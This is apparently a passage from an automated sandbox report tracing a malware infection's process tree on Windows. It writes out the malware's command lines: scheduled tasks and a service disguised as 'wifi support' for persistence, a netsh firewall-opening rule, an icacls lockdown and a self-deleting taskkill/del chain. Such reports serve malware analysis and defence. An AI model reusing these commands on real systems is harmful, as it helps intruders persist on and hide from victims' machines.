                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:9916
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:9908
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe"
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:592
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2243620.scr
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2243620.scr" /S
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                          PID:8620
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                    PID:3560
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exe
                                                                                                                                                                                                                                                                                                      Thu2026c04e7218e1.exe
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:4132
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp" /SL5="$7002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exe"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                          PID:4944
                                                                                                                                                                                                                                                                                                          • C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:5284
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp" /SL5="$7007A,281924,62464,C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                              PID:5448
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe"
                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                            PID:5336
                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                              dw20.exe -x -s 2228
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:12896
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe"
                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:5456
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:6684
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                    PID:6604
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                      PID:6148
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631826465 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                          PID:9576
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe & exit
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:6876
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:7140
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                          PID:6096
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:6152
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ql4spmkl.k4l\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                          PID:6500
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:4248
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2090b5515d63b2.exe
                                                                                                                                                                                                                                                                                                                    Thu2090b5515d63b2.exe
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    PID:4564
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                  PID:740
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2025d6674aed72ba.exe
                                                                                                                                                                                                                                                                                                                    Thu2025d6674aed72ba.exe /mixone
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:1788
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 656
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      PID:1372
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 672
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      PID:4448
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 680
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 728
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                      PID:4520
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 888
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                      PID:4456
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:1876
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20fdd9ac35a68.exe
                                                                                                                                                                                                                                                                                                                      Thu20fdd9ac35a68.exe
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:3224
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:2828
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exe
                                                                                                                                                                                                                                                                                                                        Thu203cdb52ef3c6580d.exe
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                        PID:4700
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exe
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:640
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:3360
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                  PID:9656
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                    PID:10192
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9794.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9794.exe
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                  PID:9784
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9794.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9794.exe
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:7688
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AA61.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\AA61.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:10176
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BB89.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BB89.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:9428
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BF24.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BF24.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                      PID:9600
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:9828
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                          PID:8028
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\bca106d2-155a-4288-a1bc-2ca8798ce8c3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                            PID:9528
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                            PID:10288
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:4576
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                  PID:12852
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                    PID:10840
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:12816
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                          taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                          PID:13352
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                          PID:12440
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"
                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                    PID:5128
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                        PID:11364
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                          PID:8720
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\50E6.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\50E6.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6020
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\68D4.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\68D4.exe
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                PID:10112
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffihpkvc\
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:10080
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oamuufuc.exe" C:\Windows\SysWOW64\ffihpkvc\
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:9812
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                        PID:9828
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" create ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\oamuufuc.exe /d\"C:\Users\Admin\AppData\Local\Temp\68D4.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:6704
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" description ffihpkvc "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:6264
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" start ffihpkvc
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1208
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:9312
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\oamuufuc.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\oamuufuc.exe" /d"C:\Users\Admin\AppData\Local\Temp\68D4.exe"
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:5632
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nhdjuewc.exe" C:\Windows\SysWOW64\ffihpkvc\
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5492
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" config ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\nhdjuewc.exe /d\"C:\Users\Admin\oamuufuc.exe\""
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:480
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start ffihpkvc
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:8112
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1780.bat" "
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4160
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6032
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\818D.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\818D.exe
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
